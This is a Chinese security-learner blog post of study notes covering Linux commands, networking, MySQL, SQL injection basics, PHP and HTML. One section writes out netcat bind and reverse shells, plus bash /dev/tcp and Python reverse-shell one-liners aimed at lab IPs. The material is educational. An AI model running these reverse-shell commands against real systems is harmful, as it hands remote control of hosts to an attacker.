<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="https://images.atsud0.me/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="https://images.atsud0.me/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="https://images.atsud0.me/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="https://images.atsud0.me/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"atsud0.me","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="主要是这段时间的一些笔记总结。">
<meta property="og:type" content="article">
<meta property="og:title" content="笔记">
<meta property="og:url" content="http://atsud0.me/2020/04/24/%E7%AC%94%E8%AE%B0/index.html">
<meta property="og:site_name" content="雪之下二丁目鹤岗八幡宫">
<meta property="og:description" content="主要是这段时间的一些笔记总结。">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2020-04-24T11:17:36.000Z">
<meta property="article:modified_time" content="2020-05-17T03:59:13.000Z">
<meta property="article:author" content="atsud0">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://atsud0.me/2020/04/24/%E7%AC%94%E8%AE%B0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>笔记 | 雪之下二丁目鹤岗八幡宫</title>
  
    <script>
      function sendPageView() {
        if (CONFIG.hostname !== location.hostname) return;
        var uid = localStorage.getItem('uid') || (Math.random() + '.' + Math.random());
        localStorage.setItem('uid', uid);
        navigator.sendBeacon('https://www.google-analytics.com/collect', new URLSearchParams({
          v  : 1,
          tid: 'UA-163969429-1',
          cid: uid,
          t  : 'pageview',
          dp : encodeURIComponent(location.pathname)
        }));
      }
      document.addEventListener('pjax:complete', sendPageView);
      sendPageView();
    </script>






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">雪之下二丁目鹤岗八幡宫</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/index.html" rel="section"><i class="fa fa-tags fa-fw"></i>Tags<span class="badge">174</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories<span class="badge">10</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives<span class="badge">136</span></a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://atsud0.me/2020/04/24/%E7%AC%94%E8%AE%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://images.atsud0.me/images/atsud0-avator.jpg">
      <meta itemprop="name" content="atsud0">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="雪之下二丁目鹤岗八幡宫">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          笔记
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2020-04-24 19:17:36" itemprop="dateCreated datePublished" datetime="2020-04-24T19:17:36+08:00">2020-04-24</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-05-17 11:59:13" itemprop="dateModified" datetime="2020-05-17T11:59:13+08:00">2020-05-17</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Note/" itemprop="url" rel="index"><span itemprop="name">Note</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="Symbols count in article">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">Symbols count in article: </span>
              <span>14k</span>
            </span>
            <span class="post-meta-item" title="Reading time">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">Reading time &asymp;</span>
              <span>13 mins.</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>主要是这段时间的一些笔记总结。</p>
<a id="more"></a>

<h1 id="A级别-重要知识点"><a href="#A级别-重要知识点" class="headerlink" title="A级别:重要知识点"></a>A级别:重要知识点</h1><h2 id="一、虚拟机："><a href="#一、虚拟机：" class="headerlink" title="一、虚拟机："></a>一、虚拟机：</h2><h3 id="1-三种网络模式："><a href="#1-三种网络模式：" class="headerlink" title="1.三种网络模式："></a>1.三种网络模式：</h3><p>桥接<br>NAT<br>仅主机模式</p>
<h2 id="二、Linux"><a href="#二、Linux" class="headerlink" title="二、Linux"></a>二、Linux</h2><h3 id="1-运行级别：init"><a href="#1-运行级别：init" class="headerlink" title="1.运行级别：init"></a>1.运行级别：init</h3><ul>
<li><strong>运行级别0</strong>：系统关机状态，系统默认运行级别不能设为0，否则不能正常启动</li>
<li>运行级别1：单用户工作状态，root权限，用于系统维护，禁止远程登陆</li>
<li>运行级别2：多用户状态(没有NFS)</li>
<li>运行级别3：完全的多用户状态(有NFS)，登陆后进入控制台命令行模式</li>
<li>运行级别4：系统未使用，保留</li>
<li>运行级别5：X11控制台，登陆后进入图形GUI模式</li>
<li><strong>运行级别6</strong>：系统正常关闭并重启，默认运行级别不能设为6，否则不能正常启动</li>
</ul>
<p>如果需要永久切换运行级别，需要在配置文件中修改</p>
<h3 id="2-Linux目录结构"><a href="#2-Linux目录结构" class="headerlink" title="2.Linux目录结构"></a>2.Linux目录结构</h3><ul>
<li>/bin：bin是Binary的缩写, 这个目录存放着最经常使用的命令。</li>
<li>/sbin：s就是Super User的意思，这里存放的是系统管理员使用的系统管理程序。</li>
<li>/etc：这个目录用来存放所有的系统管理所需要的配置文件和子目录。</li>
<li>/home：普通用户的主目录</li>
<li>/root：该目录为系统管理员，也称作超级权限者的用户主目录。</li>
<li>/tmp：这个目录是用来存放一些临时文件的。（重要主要体现在权限上）</li>
</ul>
<h3 id="3-常用命令"><a href="#3-常用命令" class="headerlink" title="3.常用命令"></a>3.常用命令</h3><p>绝对路径  参照根目录<br>相对路径  参照当前目录</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">.&#x2F;    当前路径       ..&#x2F;    上一层路径 </span><br><span class="line">ls -la    查看文件</span><br><span class="line">man     帮助</span><br><span class="line">ctrl + c   强制终止</span><br><span class="line">touch    创建文件</span><br><span class="line">mkdir    创建目录</span><br><span class="line">rm -fr    删除文件&#x2F;目录</span><br><span class="line">pwd      查看当前所在路径</span><br><span class="line">cp       复制</span><br><span class="line">mv       移动</span><br><span class="line">cat       读取文件内容</span><br><span class="line">head     从头开始读取文件内容</span><br><span class="line">tail       从尾部开始读取文件内容</span><br><span class="line">more     读取文件内容</span><br><span class="line">less       读取文件内容</span><br><span class="line">chmod 777 文件名   （read:4、write:2、excute:1）  给文件赋权限</span><br><span class="line">useradd 选项 用户名   创建账号</span><br><span class="line">userdel 选项 用户名    删除账号</span><br><span class="line">usermod 选项 用户名   修改账号</span><br><span class="line">groupadd 【选项】 用户组   添加用户组 </span><br><span class="line">groupdel 用户组             删除用户组</span><br><span class="line">groupmod 选项 用户组      修改用户组属性</span><br><span class="line">apt-get install xxxx      安装软件</span><br><span class="line">tar -zxvf xxxx.tar.gz      解压</span><br><span class="line">tar -cxvf xxxx.tar.gz      压缩</span><br><span class="line">whoami         查看当前登录用户</span><br><span class="line">history          查看历史命令</span><br><span class="line">|                管道符，前面的输出是后面的输入</span><br><span class="line">id               查看当前用户ID情况       </span><br><span class="line">find -name      按文件名字查找</span><br><span class="line">find -type f&#x2F;d    按文件类型查找</span><br><span class="line">ps -ef           查看进程</span><br><span class="line">service 服务名 start&#x2F;stop&#x2F;restart&#x2F;status     开启&#x2F;关闭&#x2F;重启&#x2F;查看 服务</span><br><span class="line">kill -9           强制终止进程</span><br><span class="line">ifconfig          查看IP地址</span><br><span class="line">uname           查看内核信息</span><br><span class="line">netstat -ntlp      查看网络状态</span><br></pre></td></tr></table></figure>
<h3 id="4-重要系统文件"><a href="#4-重要系统文件" class="headerlink" title="4.重要系统文件"></a>4.重要系统文件</h3><p><code>/etc/passwd</code>：存储用户信息</p>
<p><code>/etc/shadow</code>：存储加密后的密码</p>
<p><code>/etc/group</code>： 用户组相关信息</p>
<h3 id="5-vim"><a href="#5-vim" class="headerlink" title="5.vim"></a>5.vim</h3><h2 id="三、网络基础"><a href="#三、网络基础" class="headerlink" title="三、网络基础"></a>三、网络基础</h2><h3 id="1-IP"><a href="#1-IP" class="headerlink" title="1.IP"></a>1.IP</h3><p>IP地址是32位二进制数。<br>二进制和十进制的转换。<br>局域网地址：以10、172、192开头的三类地址，主要应用在采用TCP/IP协议互联单位局域网或校园网络内部。 （有可能是，不是一定是）  </p>
<h3 id="2-子网掩码"><a href="#2-子网掩码" class="headerlink" title="2.子网掩码"></a>2.子网掩码</h3><p>子网掩码的作用是将某个IP地址划分成网络地址和主机地址。必须和IP地址同时使用。<br>判断两个主机IP是否在一个子网：将两个IP同时和子网掩码进行与运算，如果所得结果相同，则处于同一个子网。<br>子网掩码1代表网络位，0代表主机位，1和0不能交叉出现。</p>
<h3 id="3-网关"><a href="#3-网关" class="headerlink" title="3.网关"></a>3.网关</h3><p>网关（Gateway）就是一个网络连接到另一个网络的“关口”<br>网关是和其他网络进行通信的出口，如果子网内的主机通信，可以不配置网关。</p>
<h3 id="4-通信子网和资源子网"><a href="#4-通信子网和资源子网" class="headerlink" title="4. 通信子网和资源子网"></a>4. 通信子网和资源子网</h3><p>功能上将计算机网络逻辑划分为<code>资源子网</code>和<code>通信子网</code>。</p>
<p>对于TCP/IP五层协议来说：</p>
<blockquote>
<p>其中资源子网为：应用层，传输层。<br>通信子网为：网络层、数据链路层、物理层。</p>
</blockquote>
<h3 id="5-OSI参考模型"><a href="#5-OSI参考模型" class="headerlink" title="5.OSI参考模型"></a>5.OSI参考模型</h3><table>
<thead>
<tr>
<th>OSI七层</th>
</tr>
</thead>
<tbody><tr>
<td>应用层</td>
</tr>
<tr>
<td>表示层</td>
</tr>
<tr>
<td>会话层</td>
</tr>
<tr>
<td>传输层</td>
</tr>
<tr>
<td>网络层</td>
</tr>
<tr>
<td>数据链路层</td>
</tr>
<tr>
<td>物理层</td>
</tr>
</tbody></table>
<h3 id="6-TCP-IP参考模型"><a href="#6-TCP-IP参考模型" class="headerlink" title="6.TCP/IP参考模型"></a>6.TCP/IP参考模型</h3><table>
<thead>
<tr>
<th>TCP五层</th>
<th>功能</th>
</tr>
</thead>
<tbody><tr>
<td>应用层</td>
<td>QQ，微信等应用软件</td>
</tr>
<tr>
<td>传输层</td>
<td>封装源端口和目的端口信息     TCP/UDP协议</td>
</tr>
<tr>
<td>网络层</td>
<td>封装源IP和目标IP信息        IP协议</td>
</tr>
<tr>
<td>数据链路层</td>
<td>封装mac地址信息</td>
</tr>
<tr>
<td>物理层</td>
<td></td>
</tr>
</tbody></table>
<h2 id="四、数据库"><a href="#四、数据库" class="headerlink" title="四、数据库"></a>四、数据库</h2><h3 id="1-分类"><a href="#1-分类" class="headerlink" title="1.分类"></a>1.分类</h3><p>关系型数据库和非关系型数据库</p>
<p>关系型数据库：MSSQL 、MySQL 、Access及其他常见数据库均为关系型数据库 </p>
<h3 id="2-特点"><a href="#2-特点" class="headerlink" title="2.特点"></a>2.特点</h3><p>(1)、Mysql是一种开源免费的数据库产品<br>(2)、Mysql对PHP的支持是最好（WAMP或者LAMP）<br>(3). Mysql是一种C/S结构：客户端和服务端</p>
<h3 id="3-数据库连接及退出"><a href="#3-数据库连接及退出" class="headerlink" title="3.数据库连接及退出"></a>3.数据库连接及退出</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql.exe&#x2F;mysql    [-h主机地址]   [-P端口]   -u用户名    -p密码</span><br></pre></td></tr></table></figure>
<p>注意事项</p>
<ol>
<li>通常端口都可以默认：mysql坚挺的端口通常都是3306</li>
<li>密码的输入可以先输入-p，直接换行，然后再以密文方式输入密码</li>
<li>参数和值之间连这些不加空格</li>
</ol>
<p>退出：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">exit;		</span><br><span class="line">\q;		</span><br><span class="line">quit；</span><br></pre></td></tr></table></figure>
<h3 id="4-常见数据库命令"><a href="#4-常见数据库命令" class="headerlink" title="4.常见数据库命令"></a>4.常见数据库命令</h3><p><code>create database</code>                    创建数据库</p>
<p><code>create table</code> 表名(字段名 字段类型 [字段属性], 字段名 字段类型 [字段属性],…) [表选项]     创建数据表</p>
<p><code>show databases;</code>                   显示全部数据库</p>
<p><code>show tables;</code>                    显示全部数据表</p>
<p><code>show create database</code>数据库名字;   显示数据库创建语句</p>
<p><code>show create table</code>表名;             显示表创建语句</p>
<p><code>use</code> 数据库名字[;]                  选择数据库/进入数据库</p>
<p><code>drop database</code> 数据库名字;          删除数据库</p>
<p><code>drop table</code> 表名[,表名2…]；         可以同时删除多个数据表</p>
<p>数据库名.数据表<br><code>create table</code> 新表名 <code>like</code> 表名       复制表结构（仅仅复制结构不复制数据）</p>
<p><code>desc</code> 表名;                        显示表结构</p>
<p><code>rename table</code> 旧表名 <code>to</code> 新表名     修改表名</p>
<p><code>update</code> 表名 <code>set</code> 字段名 = 新值 [where 条件];   更新数据</p>
<p><code>select</code> 字段列表<code>/* from</code> 表名 <code>where</code> 字段名 = 值;   查询。*代表所有字段。<br><code>set names</code> 字符集</p>
<h3 id="5-SQL注入相关重点内容"><a href="#5-SQL注入相关重点内容" class="headerlink" title="5.SQL注入相关重点内容"></a>5.SQL注入相关重点内容</h3><p>1.<code>group_concat()</code>   为了将分组中指定的字段进行合并（字符串拼接）</p>
<p>2.<code>order by</code>排序：根据校对规则对数据进行排序，在SQL注入中用来判断查询字段数。</p>
<p>3.<code>limit 1</code> 限制查询结果返回1条     <code>limit 0,1</code>   限制获取结果为第一条记录，0代表第一条记录开始取，1代表获取的数量是一条  </p>
<p>4.联合查询：</p>
<p>语法：<code>select</code> 语句1 <code>union select</code> 语句2；（要求：语句1和语句2查询字段数一样！！！） </p>
<p>5.注释符：<br>单行注释：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#</span><br><span class="line">-- （不要忽略--后面的空格）（在url中输入可以输入--+）</span><br></pre></td></tr></table></figure>
<p>多行注释：<br><code>/*     */</code></p>
<p>6.<code>information_schema</code>数据库<br>三个重点表</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">schemata        数据库相关信息，show databases就是从这个表中得到的结果,它的重点字段是：schema_name</span><br><span class="line"></span><br><span class="line">tables              数据表的相关信息，它的重点字段table_name存的是表名  另一个重点字段table_schema用来存它属于哪个数据库</span><br><span class="line"></span><br><span class="line">columns          列信息，第一个重点字段table_schema ,第二个重点字段：table_name ，            column_name:列的名字</span><br></pre></td></tr></table></figure>

<h2 id="五、编程语言类"><a href="#五、编程语言类" class="headerlink" title="五、编程语言类"></a>五、编程语言类</h2><h3 id="一、单引号和双引号"><a href="#一、单引号和双引号" class="headerlink" title="一、单引号和双引号"></a>一、单引号和双引号</h3><ol>
<li>单引号原样输出</li>
<li>双引号可以识别变量和转义。</li>
</ol>
<h3 id="二、变量名命名规则"><a href="#二、变量名命名规则" class="headerlink" title="二、变量名命名规则"></a>二、变量名命名规则</h3><p>变量名由英文字母，数字和下划线构成，首个字符不能以数字开头，中间不能有空格 。</p>
<h3 id="三、数组下标"><a href="#三、数组下标" class="headerlink" title="三、数组下标"></a>三、数组下标</h3><p>数组元素的下标由0开始。</p>
<h3 id="四、break和continue"><a href="#四、break和continue" class="headerlink" title="四、break和continue"></a>四、break和continue</h3><p>break:      跳出整个循环<br>continue:   跳出当前循环</p>
<h3 id="五、不同等号的含义"><a href="#五、不同等号的含义" class="headerlink" title="五、不同等号的含义"></a>五、不同等号的含义</h3><p>=       赋值运算符，将等号右边的赋值给左边</p>
<p>==     判断左右两边值是否相等</p>
<p>===    判断左右两边值和类型是否均相等</p>
<h3 id="六、逻辑运算"><a href="#六、逻辑运算" class="headerlink" title="六、逻辑运算"></a>六、逻辑运算</h3><p>与运算：两者均为真则结果为真</p>
<p>或运算：两者其一为真，则结果为真。</p>
<p>非运算：本身为真，取非为假，反之本身为假，取非为真。</p>
<h2 id="六、HTML"><a href="#六、HTML" class="headerlink" title="六、HTML"></a>六、HTML</h2><h3 id="1-基本框架"><a href="#1-基本框架" class="headerlink" title="1.基本框架"></a>1.基本框架</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;title&gt;标题&lt;&#x2F;title&gt;</span><br><span class="line">&lt;&#x2F;head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;&#x2F;body&gt;</span><br><span class="line">&lt;&#x2F;html&gt;</span><br></pre></td></tr></table></figure>
<h3 id="2-常用标签"><a href="#2-常用标签" class="headerlink" title="2.常用标签"></a>2.常用标签</h3><p>需要闭合</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;p&gt;    段落</span><br><span class="line">&lt;h1&gt;…&lt;h6&gt;   标题</span><br><span class="line">&lt;a href&#x3D;””&gt;    超链接</span><br><span class="line">&lt;image src&#x3D;””&gt; 图片</span><br><span class="line">&lt;table&gt; &lt;tr&gt;&lt;td&gt; 表格相关标签</span><br><span class="line">&lt;div&gt;   块标签</span><br><span class="line">&lt;form&gt; &lt;input&gt; 表单相关标签</span><br><span class="line">&lt;b&gt; 字体加粗  &lt;i&gt;字体倾斜</span><br><span class="line">&lt;script&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">不需要闭合</span><br><span class="line">&lt;hr&gt;   横线</span><br><span class="line">&lt;br&gt;   换行</span><br></pre></td></tr></table></figure>

<h2 id="七、nc及Linux反弹shell"><a href="#七、nc及Linux反弹shell" class="headerlink" title="七、nc及Linux反弹shell"></a>七、nc及Linux反弹shell</h2><h3 id="NC远程控制"><a href="#NC远程控制" class="headerlink" title="NC远程控制"></a>NC远程控制</h3><p>正向：<br>A: <code>nc -lp 333 -c bash</code><br>B: <code>nc -nv 192.168.239.140 333</code></p>
<p>反向：<br>A: <code>nc -lp 333</code><br>B: <code>nc –nv 192.168.239.140 333 -c bash</code></p>
<h3 id="Linux反弹shell"><a href="#Linux反弹shell" class="headerlink" title="Linux反弹shell"></a>Linux反弹shell</h3><p>方式一：<br>攻击机：<code>nc -lvp 8888</code></p>
<p>被攻击机：<code>bash -i &gt;&amp; /dev/tcp/192.168.239.140/8888 0&gt;&amp;1</code></p>
<p>方式二：<br>攻击机：<code>nc -lvp 8888</code><br>被攻击机：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c &quot;import os,socket,subprocess;s&#x3D;socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&#39;192.168.239.130&#39;,8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p&#x3D;subprocess.call([&#39;&#x2F;bin&#x2F;bash&#39;,&#39;-i&#39;])&quot;</span><br></pre></td></tr></table></figure>

<h2 id="八、PHP"><a href="#八、PHP" class="headerlink" title="八、PHP"></a>八、PHP</h2><h3 id="1-注释符"><a href="#1-注释符" class="headerlink" title="1.注释符"></a>1.注释符</h3><p>单行注释</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F;   </span><br><span class="line">#</span><br></pre></td></tr></table></figure>
<p>多行注释</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;* ……*&#x2F;</span><br></pre></td></tr></table></figure>
<h3 id="2-语句分隔符"><a href="#2-语句分隔符" class="headerlink" title="2.语句分隔符"></a>2.语句分隔符</h3><p><code>；</code></p>
<h3 id="3-变量语法规则"><a href="#3-变量语法规则" class="headerlink" title="3.变量语法规则"></a>3.变量语法规则</h3><p>声明和使用时都需要加<code>$</code></p>
<h3 id="4-变量传值"><a href="#4-变量传值" class="headerlink" title="4.变量传值"></a>4.变量传值</h3><p>值传递</p>
<blockquote>
<p>将变量保存的值复制一份，然后将新的值给另外一个变量保存（两个变量没有关系）</p>
</blockquote>
<p>引用传递</p>
<blockquote>
<p>将变量保存的值所在的内存地址，传递给另外一个变量：两个变量指向同一块内存空间（两个变量是同一个值）</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$新变量 &#x3D; &amp;$老变量;</span><br></pre></td></tr></table></figure>

<h3 id="5-选择循环结构"><a href="#5-选择循环结构" class="headerlink" title="5.选择循环结构"></a>5.选择循环结构</h3><h4 id="if"><a href="#if" class="headerlink" title="if"></a>if</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">if(条件表达式1)&#123;</span><br><span class="line">	&#x2F;&#x2F;满足条件表达式1的代码段;</span><br><span class="line">&#125;elseif(条件表达式2)&#123;</span><br><span class="line">	&#x2F;&#x2F;不满足表达式1条件，但是满足表达式2的代码;</span><br><span class="line">&#125;…	&#x2F;&#x2F;可以使用多个elseif来进行再次条件筛选</span><br><span class="line">else&#123;</span><br><span class="line">	&#x2F;&#x2F;全部不满足要执行的代码;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>条件表达式==和=不相同！！！</p>
<h4 id="switch"><a href="#switch" class="headerlink" title="switch"></a>switch</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">switch(条件表达式)&#123;</span><br><span class="line">	case 值1:					</span><br><span class="line">		要执行的代码段;</span><br><span class="line">		break;					</span><br><span class="line">	case 值2:</span><br><span class="line">		要执行的代码段;</span><br><span class="line">		break;</span><br><span class="line">	…</span><br><span class="line">	default:</span><br><span class="line">		&#x2F;&#x2F;匹配失败的代码;</span><br><span class="line">		break;</span><br><span class="line">&#125;</span><br><span class="line">不要忘了写break</span><br></pre></td></tr></table></figure>

<h4 id="for"><a href="#for" class="headerlink" title="for"></a>for</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">for(条件表达式1;条件表达式2;条件表达式3)&#123;</span><br><span class="line">	&#x2F;&#x2F;条件表达式1：定义初始化条件，可以有多种赋值语句存在，使用逗号分隔即可</span><br><span class="line">	&#x2F;&#x2F;条件表达式2：边界判定，限定循环执行的次数</span><br><span class="line">	&#x2F;&#x2F;条件表达式3：用来执行条件变化（自操作）</span><br><span class="line">	&#x2F;&#x2F;循环体</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
